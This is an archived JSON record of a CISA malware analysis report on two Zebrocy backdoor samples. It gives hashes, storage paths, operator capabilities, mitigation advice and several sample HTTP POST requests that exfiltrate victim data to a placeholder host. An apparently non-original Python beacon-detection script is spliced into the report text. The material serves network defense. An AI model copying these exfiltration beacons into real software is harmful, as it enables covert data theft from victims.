{
	"id": "732f4c60-37db-48b2-b470-7755f41b57e6",
	"created_at": "2026-04-06T00:08:09.171298Z",
	"updated_at": "2026-04-10T13:11:18.707909Z",
	"deleted_at": null,
	"sha1_hash": "1468a5f2048824f00d6689e64cb7ad159d5da667",
	"title": "MAR-10310246-1.v1 – ZEBROCY Backdoor | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 62930,
	"plain_text": "MAR-10310246-1.v1 – ZEBROCY Backdoor | CISA\r\nPublished: 2020-10-29 · Archived: 2026-04-05 14:11:13 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial\r\nproduct or service referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.\r\nSummary\r\nDescription\r\nThis Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security\r\nAgency (CISA) and the Cyber National Mission Force (CNMF). The malware variant, known as Zebrocy, has been used by\r\na sophisticated cyber actor. CISA and CNMF are distributing this MAR to enable network defense and reduce exposure to\r\nmalicious activity. This MAR includes suggested response actions and recommended mitigation techniques.\r\nTwo Windows executables identified as a new variant of the Zebrocy backdoor were submitted for analysis. The files are\r\ndesigned to allow a remote operator to perform various functions on the compromised system.\r\nUsers or administrators should flag activity associated with the malware and report the activity to CISA or the FBI Cyber\r\nWatch (CyWatch), and give the activity the highest priority for enhanced mitigation. 
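The Findings section below shows the beacon both samples send: a multipart form-data POST to / with the Go net/http default User-Agent, a single form field named filename whose file name is a long hexadecimal string, and a body of a single byte. The following Python is an added example written for this page, not code from the CISA report or from the malware. It parses such a request and reports which of those traits are present, then hex-decodes the storage file name the report gives under the Policies directory. The sample request is reconstructed from the report's POST sample with a placeholder host; the benign upload is constructed for contrast; the minimum hex length and the body-size threshold are assumptions.

```python
# Added example, not code from the CISA report: inspect an HTTP POST for the
# traits the MAR attributes to the Zebrocy beacon, and hex-decode the storage
# file name it reports. Values marked as assumptions are this example's own.
import re

DQ = chr(34)  # the double-quote character, used to build the header regexes

# Reconstructed from the MAR's POST request sample: placeholder host, the
# report's boundary and filename values, and a body consisting of '1'.
SAMPLE_POST = '''POST / HTTP/1.1
Host: www.example.com
User-Agent: Go-http-client/1.1
Content-Type: multipart/form-data; boundary=ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228
Accept-Encoding: gzip

--ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228
Content-Disposition: form-data; name=\"filename\"; filename=\"04760175017f0d0d7f7706067302007f0573010204007134463136334635\"
Content-Type: application/octet-stream

1
--ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228--
'''

# Constructed benign browser upload, for contrast (not from the report).
BENIGN_POST = '''POST /upload HTTP/1.1
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data; boundary=abc123

--abc123
Content-Disposition: form-data; name=\"file\"; filename=\"report.pdf\"
Content-Type: application/pdf

%PDF-1.4 constructed placeholder
--abc123--
'''

# Storage file name the MAR gives under the Policies directory (both samples).
STORAGE_FILE_NAME = '3030304332393839394630353537343934453244'

NAME_RE = re.compile('(?<![a-z])name=' + DQ + '([^' + DQ + ']*)' + DQ)
FILENAME_RE = re.compile('filename=' + DQ + '([^' + DQ + ']*)' + DQ)
HEX_RE = re.compile('^[0-9a-f]+$')
MIN_HEX_LEN = 32  # assumption; the report's sample filename is 60 hex digits


def parse_request(raw):
    '''Split a raw HTTP/1.1 request into (request line, header dict, body lines).'''
    lines = raw.splitlines()
    headers = {}
    i = 1
    while i < len(lines) and lines[i]:
        name, _, value = lines[i].partition(':')
        headers[name.strip().lower()] = value.strip()
        i += 1
    return lines[0], headers, lines[i + 1:]


def parse_multipart(content_type, body_lines):
    '''Return each part as (header lines, data lines); stop at the closing boundary.'''
    match = re.search('boundary=([^;]+)', content_type)
    if not match:
        return []
    boundary = '--' + match.group(1).strip()
    parts, current, in_data = [], None, False
    for line in body_lines:
        if line.startswith(boundary):
            if current is not None:
                parts.append(current)
            if line == boundary + '--':
                break
            current, in_data = ([], []), False
        elif current is None:
            continue
        elif in_data:
            current[1].append(line)
        elif line == '':
            in_data = True
        else:
            current[0].append(line)
    return parts


def classify_request(raw):
    '''Return the names of the Zebrocy beacon traits present in one request.'''
    request_line, headers, body = parse_request(raw)
    hits = []
    if request_line.startswith('POST / '):
        hits.append('post_to_root')
    if headers.get('user-agent') == 'Go-http-client/1.1':
        hits.append('go_default_user_agent')
    content_type = headers.get('content-type', '')
    if not content_type.startswith('multipart/form-data'):
        return hits
    parts = parse_multipart(content_type, body)
    if len(parts) != 1:  # the beacon in the report carries exactly one part
        return hits
    part_headers = ' '.join(parts[0][0])
    data = ''.join(parts[0][1]).strip()
    name = NAME_RE.search(part_headers)
    fname = FILENAME_RE.search(part_headers)
    if name and name.group(1) == 'filename':
        hits.append('form_field_named_filename')
    if fname and len(fname.group(1)) >= MIN_HEX_LEN and HEX_RE.match(fname.group(1)):
        hits.append('hex_encoded_filename')
    if 'application/octet-stream' in part_headers:
        hits.append('octet_stream_part')
    if len(data) <= 4:  # assumption; the report's sample body is the single byte '1'
        hits.append('tiny_part_body')
    return hits


def decode_hex_name(component):
    '''Hex-decode a path component to ASCII; None if it is not hex-encoded ASCII.'''
    try:
        return bytes.fromhex(component).decode('ascii')
    except ValueError:
        return None
```

Go-http-client/1.1 is what any Go program using net/http sends when it sets no User-Agent, so that header alone is a weak signal; the combination of traits is what merits an alert. The report describes the exfiltrated data as encrypted with a hostname-derived key and hex encoded, so the hex file name should be matched on its shape rather than on the sample value. The storage file name decodes to the ASCII string 000C29899F0557494E2D; the report does not state what that value represents.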
For more information on malicious\r\ncyber activity, please visit https[:]//www[.]us-cert.gov.\r\nFor a downloadable copy of IOCs, see MAR-10310246-1.v1.\r\nSubmitted Files (2)\r\n0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1 (smqft_exe)\r\n2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8 (sespmw_exe)\r\nFindings\r\n0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1\r\nTags\r\nbackdoor\r\nDetails\r\nName smqft_exe\r\nSize 4307968 bytes\r\nType PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows\r\nMD5 ba9c59783b52b93aa6dfd4cfffc16f2b\r\nSHA1 ee6753448c3960e8f7ba325a2c00009c31615fd2\r\nSHA256 0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1\r\nSHA512 bd9e059a9d8fc7deffd12908c01c7c53fbfa9af95296365aa28080d89a668e9eed9c2770ba952cf0174f464dc93e410c92dfdbbaa7bee9f477\r\nssdeep 49152:vATdsrWzBmMmRytymPIcGkJGUAErdu5Pp6oUlMXH85jHuXJfZLJC23:gYYBmMdEsx5gDXgHuTLJ\r\nEntropy 6.196940\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b\r\nPage 1 of 6\n\nAntivirus\r\nBitDefender Gen:Variant.Babar.17722\r\nEmsisoft Gen:Variant.Babar.17722 (B)\r\nLavasoft Gen:Variant.Babar.17722\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00 (a zero PE timestamp, i.e. the Unix epoch; not a real build time)\r\nImport Hash 20acdf581665d0a5acf497c2fe5e0662\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nb6114d2ef9c71d56d934ad743f66d209 header 1024 2.184050\r\n0ead1c8fd485e916e3564c37083fb754 .text 1952256 6.048645\r\na5a4f98bad8aefba03b1fd8efa3e8668 .data 196096 5.841971\r\n96bfb1a9a7e45816c45b7d7c1bf3c578 .rdata 2153984 5.690400\r\n916cd27c0226ce956ed74ddf600a3a94 .eh_fram 1024 4.244370\r\nd41d8cd98f00b204e9800998ecf8427e .bss 0 0.000000\r\n1f825370fd049566e1e933455eb0cd06 .idata 2560 4.462264\r\n486c39eb96458f6f5bdb80d71bb0f828 .CRT 512 0.118370\r\naa692f6a7441edad64447679b7d321e8 .tls 512 0.224820\r\nDescription\r\nThis file is a 32-bit Windows executable written in the Go (Golang) 
programming language. The file has been identified as a new\r\nvariant of the Zebrocy backdoor. The file takes a command-line argument that is expected to be an Exclusive OR (XOR) obfuscated and hexadecimal\r\nencoded Uniform Resource Identifier (URI); it can also run with a plaintext URI.\r\nDisplayed below is a sample plaintext argument used by the malware:\r\n--Begin arguments--\r\nDomain: malware.exe \u003cDomain\u003e\r\nor\r\nIP: malware.exe \u003cIP address:Port\u003e\r\n--End arguments--\r\nWhen executed, it will encrypt the URI using an Advanced Encryption Standard (AES)-128 Electronic Code Book (ECB)\r\nalgorithm with a key generated from the victim's hostname. The encrypted data is hexadecimal encoded and stored in\r\n\"%AppData%\\Roaming\\Personalization\\EUDC\\Policies\\3030304332393839394630353537343934453244\".\r\nIt also collects information about the victim’s system such as username, 6 bytes of the current user’s Security Identifier (SID),\r\nand time of infection. The data is encrypted and hexadecimal encoded before being exfiltrated using the predefined URI:\r\n--Begin POST requests--\r\n--Begin POST request sample--\r\nPOST / HTTP/1.1\r\nHost: www[.]\u003cdomain\u003e.com\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 297\r\nContent-Type: multipart/form-data; boundary=ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228\r\nAccept-Encoding: gzip\r\n--ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228\r\nContent-Disposition: form-data; name=\"filename\";\r\nfilename=\"04760175017f0d0d7f7706067302007f0573010204007134463136334635\"\r\nContent-Type: application/octet-stream\r\n1\r\n--ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228--\r\n--End POST request sample--\r\n--Begin POST request sample--\r\nPOST / HTTP/1.1\r\nHost: \u003cIP address\u003e:\u003cPort\u003e\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 297\r\nContent-Type: multipart/form-data; 
boundary=44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108\r\nAccept-Encoding: gzip\r\n--44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108\r\nContent-Disposition: form-data; name=\"filename\";\r\nfilename=\"04760175017f0d0d7f7706067302007f0573010204007134463136334635\"\r\nContent-Type: application/octet-stream\r\n1\r\n--44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108--\r\n--End POST request sample--\r\n--End POST requests--\r\nThe malware is designed to encrypt future communication using an AES encryption algorithm.\r\nThe malware allows a remote operator to perform the following functions:\r\n--Begin functions--\r\nFile manipulation such as creation, modification, and deletion\r\nScreenshot capabilities\r\nDrive enumeration\r\nCommand execution (using cmd.exe)\r\nCreate a scheduled task for persistence\r\n--End functions--\r\n2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8\r\nDetails\r\nName sespmw_exe\r\nSize 4313600 bytes\r\nType PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows\r\nMD5 e8596fd7a15ecc86abbbfdea17a9e73a\r\nSHA1 be07f6a2c9d36a7e9c4d48f21e13e912e6271d83\r\nSHA256 2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8\r\nSHA512 4a2125a26467ea4eb913abe80a59a85f3341531d634766fccabd14eb8ae1a3e7ee77162df7d5fac362272558db5a6e18f84ce193296fcdfb7\r\nssdeep 49152:J8IkRvcuFh9fQgnf/1th+jrR7PNrNdbMFvm6oUlMXycR+Z5drM0us4:UJHFh91fFg/+MX9RgY0u\r\nEntropy 6.197768\r\nAntivirus\r\nBitDefender Gen:Variant.Babar.17722\r\nEmsisoft Gen:Variant.Babar.17722 (B)\r\nLavasoft Gen:Variant.Babar.17722\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1970-01-04 14:01:20-05:00 (not a plausible build time)\r\nImport Hash 20acdf581665d0a5acf497c2fe5e0662\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n2ebbe6c38d9e8d4da2449cc05f78054a header 1024 2.198390\r\na7c0885448e7013e05bf5ff61b673949 .text 
1954816 6.046127\r\n9bf966747acfa91eea3d6a1ef17cc30f .data 196096 5.843286\r\n31182660fce8ae07d0350ebe456b9179 .rdata 2157056 5.696834\r\n9eeb1eeb42e99c54c6429f9122285336 .eh_fram 1024 4.292769\r\nd41d8cd98f00b204e9800998ecf8427e .bss 0 0.000000\r\n0bc884e39b3ba72fb113d63988590b5c .idata 2560 4.424718\r\n9bbfafc74bc296cd99dc8307ffe120ac .CRT 512 0.114463\r\n2b60c482048e4a03fbb82db9c3416db5 .tls 512 0.224820\r\nDescription\r\nThis file is a 32-bit Windows executable written in the Go (Golang) programming language. The file has been identified as a new\r\nvariant of the Zebrocy backdoor. The file takes a command-line argument that is expected to be an XOR obfuscated and hexadecimal encoded URI.\r\nUnlike the other Zebrocy backdoor binary (MD5 ba9c59783b52b93aa6dfd4cfffc16f2b, smqft_exe), this file cannot run using a plaintext URI.\r\nThis file and ba9c59783b52b93aa6dfd4cfffc16f2b have similar functions.\r\nWhen executed, it will encrypt the URI using the AES-128 ECB algorithm with a key generated from the victim's hostname.\r\nThe encrypted data is hexadecimal encoded and stored in\r\n\"%AppData%\\Roaming\\UserData\\Multimedia\\Policies\\3030304332393839394630353537343934453244\".\r\nIt also collects information about the victim’s system such as username, 6 bytes of the current user’s SID, and time of infection.\r\nThe data is encrypted and hexadecimal encoded before being exfiltrated using the predefined URI.\r\n--Begin POST request--\r\nPOST / HTTP/1.1\r\nHost: www[.]\u003cdomain\u003e.com\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 297\r\nContent-Type: multipart/form-data; boundary=0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db\r\nAccept-Encoding: gzip\r\n--0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db\r\nContent-Disposition: form-data; name=\"filename\";\r\nfilename=\"04760175017f0d0d7f7706067302007f0573010204007134463136334635\"\r\nContent-Type: 
application/octet-stream\r\n1\r\n--0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db--\r\n--End POST request--\r\nThe malware is designed to encrypt future communication using an AES encryption algorithm.\r\nThe malware allows a remote operator to perform the following functions:\r\n--Begin functions--\r\nFile manipulation such as creation, modification, and deletion\r\nScreenshot capabilities\r\nDrive enumeration\r\nCommand execution (using cmd.exe)\r\nCreate a scheduled task for persistence manually\r\nMore\r\n--End functions--\r\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security\r\nposture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. 
Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\r\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and\r\nTechnology (NIST) Special Publication 800-83, \"Guide to Malware Incident Prevention \u0026 Handling for Desktops and\r\nLaptops\".\r\nContact Information\r\nDocument FAQ\r\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators for computer and network defense. To request\r\nadditional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. 
To request additional analysis, please contact CISA and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to the CISA at 1-844-Say-CISA or CISA Central.\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nRevisions\r\nOctober 29, 2020: Initial Version\r\nSource: https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b"
	],
	"report_names": [
		"ar20-303b"
	],
	"threat_actors": [],
	"ts_created_at": 1775434089,
	"ts_updated_at": 1775826678,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1468a5f2048824f00d6689e64cb7ad159d5da667.pdf",
		"text": "https://archive.orkl.eu/1468a5f2048824f00d6689e64cb7ad159d5da667.txt",
		"img": "https://archive.orkl.eu/1468a5f2048824f00d6689e64cb7ad159d5da667.jpg"
	}
}